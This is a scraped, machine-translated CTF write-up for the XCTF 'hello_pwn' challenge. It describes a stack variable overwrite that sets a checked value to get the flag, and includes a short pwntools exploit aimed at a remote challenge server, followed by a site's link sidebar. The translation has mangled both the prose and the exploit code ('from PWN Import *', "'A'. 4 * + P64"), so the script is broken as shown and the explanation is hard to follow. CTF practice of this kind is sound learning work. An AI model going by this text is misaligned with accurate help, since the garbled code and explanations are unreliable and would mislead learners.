xctf-pwn hello_pwn

Others 2020-03-22 00:02:09 views: null

Take the process to see if the file type

64, opened a NX

Direct throw IDA analysis

View sub_400686 ()

Is a flag to the function, we can see that the conditions are satisfied, if the statement of the dword_60106C == 1853186401 can get flag.

Calculate the offset

0x6C-0x68 = 0x4 4 is offset so simple variable covering a next write directly exp

exp:
from PWN Import *
P = Remote ( '111.198.29.45', 32077)
payload = 'A'. 4 * + P64 (0x6E756161) // 1853186401 turned into hexadecimal (also not turn rows)
p.recvuntil ( " GET the HelloWorld for bof lets \ the n-")
p.sendline (payload)
p.interactive ()



Guess you like

Origin www.cnblogs.com/remon535/p/12543422.html
pwn
Recommended
Open Source Daily | Linus declares war on "passive voice"; the big language model that understands human nature best; native Hongmeng is a new technical framework; open source version of Bloomberg terminal; big model "eats free food hard"
Ranking
Flutter-desktop
container 和container-fluid
One point nearly three cut Long Baoying skills invitation code 88118877
jsonEditor usage
Installation and use of Git (super detailed tutorial)
深入理解Moby Buildkit系列 #25 - Pipe设计原理
flinkcdc data collection code FlinkAPI
[Problem] Record compile-time error cordova: CordovaLib: _internal_aapt2_binary
Idea view properties Chinese into unicode code how to solve
mpvue build WeChat applet project
Daily
More
2024-10-09(1)
2024-10-08(1)
2024-10-07(1)
2024-10-06(15)
2024-10-05(7)
2024-10-04(1)
2024-10-03(7)
2024-10-02(1)
2024-10-01(0)
2024-09-30(0)

Code World

© 2018 codetd.com